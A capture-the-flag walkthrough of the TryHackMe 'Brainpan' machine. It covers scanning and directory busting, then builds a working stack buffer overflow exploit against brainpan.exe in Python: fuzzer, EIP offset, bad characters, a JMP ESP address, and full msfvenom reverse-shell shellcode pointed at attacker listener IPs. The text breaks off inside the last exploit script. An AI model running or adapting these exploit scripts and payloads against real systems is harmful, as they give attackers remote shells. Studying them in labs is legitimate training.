Walkthrough
Gaining a Foothold
Nmap
Initial scan
──(kali㉿kali)-[~]
└─$ nmap 10.10.220.161
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-14 03:50 EST
Nmap scan report for 10.10.220.161
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
9999/tcp open abyss
10000/tcp open snet-sensor-mgmt
Nmap done: 1 IP address (1 host up) scanned in 40.54 seconds
Scan on port 9999 and 10000
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p9999,10000 10.10.220.161
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-14 03:51 EST
Nmap scan report for 10.10.220.161
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
9999/tcp open abyss?
| fingerprint-strings:
| NULL:
| _| _|
| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
| _|_| _| _| _| _| _| _| _| _| _| _| _|
| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
| [________________________ WELCOME TO BRAINPAN _________________________]
|_ ENTER THE PASSWORD
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.94SVN%I=7%D=1/14%Time=65A3A090%P=x86_64-pc-linux-gnu%r
SF:(NULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|
SF:_\|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x
SF:20\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\
SF:|\x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\
SF:|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\
SF:|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x2
SF:0\x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x
SF:20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x2
SF:0\x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPA
SF:N\x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTE
SF:R\x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.11 seconds
Web Page
10.10.220.161:10000
source code
/bin
Directory busting
FFUF
/bin
┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://10.10.220.161:10000/FUZZ -recursion
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.220.161:10000/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# directory-list-2.3-medium.txt [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 276ms]
# [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
[Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
# on atleast 2 different hosts [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1038ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1039ms]
# [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1039ms]
# [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1040ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1061ms]
# Copyright 2007 James Fisher [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1062ms]
# [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1064ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1064ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1065ms]
bin [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 272ms]
[INFO] Adding a new job to the queue: http://10.10.220.161:10000/bin/FUZZ
Buffer Overflow
Avoid fuzzing at this point as we can break the executable
nc 10.10.20.71 9999
On a Windows VM
Download and run Immunity Debugger as admin
Download and run brainpan.exe as admin
Attach brainpan to Immunity Debugger
Hit play to run
Download and move mona.py to PyCommands
https://github.com/corelan/mona
onfig -set workingfolder c:\mona\%p
Mona Configuration
The mona script has been preinstalled, however to make it easier to work with, you should configure a working folder using the following command, which you can run in the command input box at the bottom of the Immunity Debugger window:
!mona config -set workingfolder c:\mona\%p
Fuzzing
import sys, socket
from time import sleep
buffer = "A" * 100
while True:
try:
payload = buffer + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
print("[+] Sending the payload...\n" + str(len(buffer)))
s.send((payload.encode()))
s.close()
sleep(1)
buffer = buffer + "A" * 100
except:
print("The fuzzing crashed at %s bytes" % str(len(buffer)))
sys.exit()
Run the fuzzer.py script using python: python3 fuzzer.py
The fuzzer will send increasingly long strings comprised of As. If the fuzzer crashes the server with one of the strings, the fuzzer should exit with an error message. Make a note of the largest number of bytes that were sent.
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ python3 fuzzer.py
[+] Sending the payload...
100
[+] Sending the payload...
200
[+] Sending the payload...
300
[+] Sending the payload...
400
[+] Sending the payload...
500
[+] Sending the payload...
600
[+] Sending the payload...
700
[+] Sending the payload...
800
[+] Sending the payload...
900
^CThe fuzzing crashed at 1000 bytes
Crash Replication & Controlling EIP
Run the following command to generate a cyclic pattern of a length 400 bytes longer that the string that crashed the server (change the -l value to this):
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
Copy the output and place it into the payload variable of the exploit.py script.
We will make a pattern exactly at the point where it crashed
┌──(kali㉿kali)-[~/LPE/brainpan] └─$ msf-pattern_create -l 1000 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
exploit.py
import sys, socket
buffer ="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
print("Sending payload...")
payload = buffer + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send((payload.encode()))
s.close()
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ python3 exploit.py
Sending payload...
Immunity crashed
EIP 35724134
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msf-pattern_offset -l 1000 -q 35724134
[*] Exact match at offset 524
That means that the EIP is at the 525th byte
Edit exploit.py
import sys, socket
buffer = "A" * 524 + "B" * 4
//This is gonna lead us up to EIP
//Then we should see 42424242
//That way we know we are controlling the EIP
print("Sending payload...")
payload = buffer + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send((payload.encode()))
s.close()
Run Immunity again and then run exploit.py
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ python3 exploit.py
Sending payload...
Finding Bad Characters
Copy badchars to exploit.py
import sys, socket
buffer = "A" * 524 + "B" * 4
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
print("Sending payload...")
payload = buffer + badchars + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send((payload.encode()))
s.close()
Run Immunity again
Crashed > good
Right-click ESP > Follow in dump
After running the script, go back to Immunity, right-click on the hex value of the ESP register and select “Follow in Dump.” The list of characters that we sent from 01 to FF are in the hex dump pane. Closely examine the entire list to see if any of the hex numbers are out of sequence, which would indicate a bad character. In this case we do not have any bad chars.
Don’t rely on mona tool for finding badchar
Run Immunity again
Install Mona and check modules
!mona modules
All False is what we want
Find JMP point
!mona find -s "\xff\xe4" -m brainpan.exe
Found 311712f3
Click the black arrow key to find 311712f3
We found the JMP point
Press F2 to set a breaking point
Once we hit JMP instruction, we can get malicious
311712F3 in Little Indian format
Edit exploit.py
import sys, socket
buffer = b"A" * 524 + b"\xf3\x12\x17\x31"
print("Sending payload...")
payload = buffer + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send(payload)
s.close()
*Heath (Course Instructor) had issues with payload encoding so here we are manually encoding our payload
Run Immunity and exploit.py
We reach breakpoint
Close Immunity
Run brainpan as admin
On kali, generate payload for a reverse shell
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.137.133 LPORT=7777 -f c -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char buf[] =
"\xda\xdf\xd9\x74\x24\xf4\xbe\xf0\x0b\xa5\x15\x58\x2b\xc9"
"\xb1\x52\x31\x70\x17\x03\x70\x17\x83\x30\x0f\x47\xe0\x4c"
"\xf8\x05\x0b\xac\xf9\x69\x85\x49\xc8\xa9\xf1\x1a\x7b\x1a"
"\x71\x4e\x70\xd1\xd7\x7a\x03\x97\xff\x8d\xa4\x12\x26\xa0"
"\x35\x0e\x1a\xa3\xb5\x4d\x4f\x03\x87\x9d\x82\x42\xc0\xc0"
"\x6f\x16\x99\x8f\xc2\x86\xae\xda\xde\x2d\xfc\xcb\x66\xd2"
"\xb5\xea\x47\x45\xcd\xb4\x47\x64\x02\xcd\xc1\x7e\x47\xe8"
"\x98\xf5\xb3\x86\x1a\xdf\x8d\x67\xb0\x1e\x22\x9a\xc8\x67"
"\x85\x45\xbf\x91\xf5\xf8\xb8\x66\x87\x26\x4c\x7c\x2f\xac"
"\xf6\x58\xd1\x61\x60\x2b\xdd\xce\xe6\x73\xc2\xd1\x2b\x08"
"\xfe\x5a\xca\xde\x76\x18\xe9\xfa\xd3\xfa\x90\x5b\xbe\xad"
"\xad\xbb\x61\x11\x08\xb0\x8c\x46\x21\x9b\xd8\xab\x08\x23"
"\x19\xa4\x1b\x50\x2b\x6b\xb0\xfe\x07\xe4\x1e\xf9\x68\xdf"
"\xe7\x95\x96\xe0\x17\xbc\x5c\xb4\x47\xd6\x75\xb5\x03\x26"
"\x79\x60\x83\x76\xd5\xdb\x64\x26\x95\x8b\x0c\x2c\x1a\xf3"
"\x2d\x4f\xf0\x9c\xc4\xaa\x93\x62\xb0\x3d\xe6\x0b\xc3\x3d"
"\xf7\xaa\x4a\xdb\x6d\x3d\x1b\x74\x1a\xa4\x06\x0e\xbb\x29"
"\x9d\x6b\xfb\xa2\x12\x8c\xb2\x42\x5e\x9e\x23\xa3\x15\xfc"
"\xe2\xbc\x83\x68\x68\x2e\x48\x68\xe7\x53\xc7\x3f\xa0\xa2"
"\x1e\xd5\x5c\x9c\x88\xcb\x9c\x78\xf2\x4f\x7b\xb9\xfd\x4e"
"\x0e\x85\xd9\x40\xd6\x06\x66\x34\x86\x50\x30\xe2\x60\x0b"
"\xf2\x5c\x3b\xe0\x5c\x08\xba\xca\x5e\x4e\xc3\x06\x29\xae"
"\x72\xff\x6c\xd1\xbb\x97\x78\xaa\xa1\x07\x86\x61\x62\x37"
"\xcd\x2b\xc3\xd0\x88\xbe\x51\xbd\x2a\x15\x95\xb8\xa8\x9f"
"\x66\x3f\xb0\xea\x63\x7b\x76\x07\x1e\x14\x13\x27\x8d\x15"
"\x36";
Edit exploit.py
Add NOPs (No Operations) for a padding
import sys, socket
buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 32
payload2 = (b"\xda\xdf\xd9\x74\x24\xf4\xbe\xf0\x0b\xa5\x15\x58\x2b\xc9"
b"\xb1\x52\x31\x70\x17\x03\x70\x17\x83\x30\x0f\x47\xe0\x4c"
b"\xf8\x05\x0b\xac\xf9\x69\x85\x49\xc8\xa9\xf1\x1a\x7b\x1a"
b"\x71\x4e\x70\xd1\xd7\x7a\x03\x97\xff\x8d\xa4\x12\x26\xa0"
b"\x35\x0e\x1a\xa3\xb5\x4d\x4f\x03\x87\x9d\x82\x42\xc0\xc0"
b"\x6f\x16\x99\x8f\xc2\x86\xae\xda\xde\x2d\xfc\xcb\x66\xd2"
b"\xb5\xea\x47\x45\xcd\xb4\x47\x64\x02\xcd\xc1\x7e\x47\xe8"
b"\x98\xf5\xb3\x86\x1a\xdf\x8d\x67\xb0\x1e\x22\x9a\xc8\x67"
b"\x85\x45\xbf\x91\xf5\xf8\xb8\x66\x87\x26\x4c\x7c\x2f\xac"
b"\xf6\x58\xd1\x61\x60\x2b\xdd\xce\xe6\x73\xc2\xd1\x2b\x08"
b"\xfe\x5a\xca\xde\x76\x18\xe9\xfa\xd3\xfa\x90\x5b\xbe\xad"
b"\xad\xbb\x61\x11\x08\xb0\x8c\x46\x21\x9b\xd8\xab\x08\x23"
b"\x19\xa4\x1b\x50\x2b\x6b\xb0\xfe\x07\xe4\x1e\xf9\x68\xdf"
b"\xe7\x95\x96\xe0\x17\xbc\x5c\xb4\x47\xd6\x75\xb5\x03\x26"
b"\x79\x60\x83\x76\xd5\xdb\x64\x26\x95\x8b\x0c\x2c\x1a\xf3"
b"\x2d\x4f\xf0\x9c\xc4\xaa\x93\x62\xb0\x3d\xe6\x0b\xc3\x3d"
b"\xf7\xaa\x4a\xdb\x6d\x3d\x1b\x74\x1a\xa4\x06\x0e\xbb\x29"
b"\x9d\x6b\xfb\xa2\x12\x8c\xb2\x42\x5e\x9e\x23\xa3\x15\xfc"
b"\xe2\xbc\x83\x68\x68\x2e\x48\x68\xe7\x53\xc7\x3f\xa0\xa2"
b"\x1e\xd5\x5c\x9c\x88\xcb\x9c\x78\xf2\x4f\x7b\xb9\xfd\x4e"
b"\x0e\x85\xd9\x40\xd6\x06\x66\x34\x86\x50\x30\xe2\x60\x0b"
b"\xf2\x5c\x3b\xe0\x5c\x08\xba\xca\x5e\x4e\xc3\x06\x29\xae"
b"\x72\xff\x6c\xd1\xbb\x97\x78\xaa\xa1\x07\x86\x61\x62\x37"
b"\xcd\x2b\xc3\xd0\x88\xbe\x51\xbd\x2a\x15\x95\xb8\xa8\x9f"
b"\x66\x3f\xb0\xea\x63\x7b\x76\x07\x1e\x14\x13\x27\x8d\x15"
b"\x36")
print("Sending payload...")
payload = buffer + payload2 + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send(payload)
s.close()
Set up a listener
Run exploit.py
We get a reverse shell
We will apply this to our attack
Do the same but with tun0 IP
Generate reverse shell payload
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.8.252.53 LPORT=7777 -f c -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char buf[] =
"\xba\xb9\x16\x38\xe2\xdb\xcd\xd9\x74\x24\xf4\x5f\x33\xc9"
"\xb1\x52\x31\x57\x12\x03\x57\x12\x83\x7e\x12\xda\x17\x7c"
"\xf3\x98\xd8\x7c\x04\xfd\x51\x99\x35\x3d\x05\xea\x66\x8d"
"\x4d\xbe\x8a\x66\x03\x2a\x18\x0a\x8c\x5d\xa9\xa1\xea\x50"
"\x2a\x99\xcf\xf3\xa8\xe0\x03\xd3\x91\x2a\x56\x12\xd5\x57"
"\x9b\x46\x8e\x1c\x0e\x76\xbb\x69\x93\xfd\xf7\x7c\x93\xe2"
"\x40\x7e\xb2\xb5\xdb\xd9\x14\x34\x0f\x52\x1d\x2e\x4c\x5f"
"\xd7\xc5\xa6\x2b\xe6\x0f\xf7\xd4\x45\x6e\x37\x27\x97\xb7"
"\xf0\xd8\xe2\xc1\x02\x64\xf5\x16\x78\xb2\x70\x8c\xda\x31"
"\x22\x68\xda\x96\xb5\xfb\xd0\x53\xb1\xa3\xf4\x62\x16\xd8"
"\x01\xee\x99\x0e\x80\xb4\xbd\x8a\xc8\x6f\xdf\x8b\xb4\xde"
"\xe0\xcb\x16\xbe\x44\x80\xbb\xab\xf4\xcb\xd3\x18\x35\xf3"
"\x23\x37\x4e\x80\x11\x98\xe4\x0e\x1a\x51\x23\xc9\x5d\x48"
"\x93\x45\xa0\x73\xe4\x4c\x67\x27\xb4\xe6\x4e\x48\x5f\xf6"
"\x6f\x9d\xf0\xa6\xdf\x4e\xb1\x16\xa0\x3e\x59\x7c\x2f\x60"
"\x79\x7f\xe5\x09\x10\x7a\x6e\x3c\xed\x78\x5b\x28\xef\x80"
"\xba\xc9\x66\x66\xa8\x19\x2f\x31\x45\x83\x6a\xc9\xf4\x4c"
"\xa1\xb4\x37\xc6\x46\x49\xf9\x2f\x22\x59\x6e\xc0\x79\x03"
"\x39\xdf\x57\x2b\xa5\x72\x3c\xab\xa0\x6e\xeb\xfc\xe5\x41"
"\xe2\x68\x18\xfb\x5c\x8e\xe1\x9d\xa7\x0a\x3e\x5e\x29\x93"
"\xb3\xda\x0d\x83\x0d\xe2\x09\xf7\xc1\xb5\xc7\xa1\xa7\x6f"
"\xa6\x1b\x7e\xc3\x60\xcb\x07\x2f\xb3\x8d\x07\x7a\x45\x71"
"\xb9\xd3\x10\x8e\x76\xb4\x94\xf7\x6a\x24\x5a\x22\x2f\x54"
"\x11\x6e\x06\xfd\xfc\xfb\x1a\x60\xff\xd6\x59\x9d\x7c\xd2"
"\x21\x5a\x9c\x97\x24\x26\x1a\x44\x55\x37\xcf\x6a\xca\x38"
"\xda";
Edit exploit.py
Change target address to THM brainpan IP
import sys, socket
buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 32
payload2 = (b"\xba\xb9\x16\x38\xe2\xdb\xcd\xd9\x74\x24\xf4\x5f\x33\xc9"
b"\xb1\x52\x31\x57\x12\x03\x57\x12\x83\x7e\x12\xda\x17\x7c"
b"\xf3\x98\xd8\x7c\x04\xfd\x51\x99\x35\x3d\x05\xea\x66\x8d"
b"\x4d\xbe\x8a\x66\x03\x2a\x18\x0a\x8c\x5d\xa9\xa1\xea\x50"
b"\x2a\x99\xcf\xf3\xa8\xe0\x03\xd3\x91\x2a\x56\x12\xd5\x57"
b"\x9b\x46\x8e\x1c\x0e\x76\xbb\x69\x93\xfd\xf7\x7c\x93\xe2"
b"\x40\x7e\xb2\xb5\xdb\xd9\x14\x34\x0f\x52\x1d\x2e\x4c\x5f"
b"\xd7\xc5\xa6\x2b\xe6\x0f\xf7\xd4\x45\x6e\x37\x27\x97\xb7"
b"\xf0\xd8\xe2\xc1\x02\x64\xf5\x16\x78\xb2\x70\x8c\xda\x31"
b"\x22\x68\xda\x96\xb5\xfb\xd0\x53\xb1\xa3\xf4\x62\x16\xd8"
b"\x01\xee\x99\x0e\x80\xb4\xbd\x8a\xc8\x6f\xdf\x8b\xb4\xde"
b"\xe0\xcb\x16\xbe\x44\x80\xbb\xab\xf4\xcb\xd3\x18\x35\xf3"
b"\x23\x37\x4e\x80\x11\x98\xe4\x0e\x1a\x51\x23\xc9\x5d\x48"
b"\x93\x45\xa0\x73\xe4\x4c\x67\x27\xb4\xe6\x4e\x48\x5f\xf6"
b"\x6f\x9d\xf0\xa6\xdf\x4e\xb1\x16\xa0\x3e\x59\x7c\x2f\x60"
b"\x79\x7f\xe5\x09\x10\x7a\x6e\x3c\xed\x78\x5b\x28\xef\x80"
b"\xba\xc9\x66\x66\xa8\x19\x2f\x31\x45\x83\x6a\xc9\xf4\x4c"
b"\xa1\xb4\x37\xc6\x46\x49\xf9\x2f\x22\x59\x6e\xc0\x79\x03"
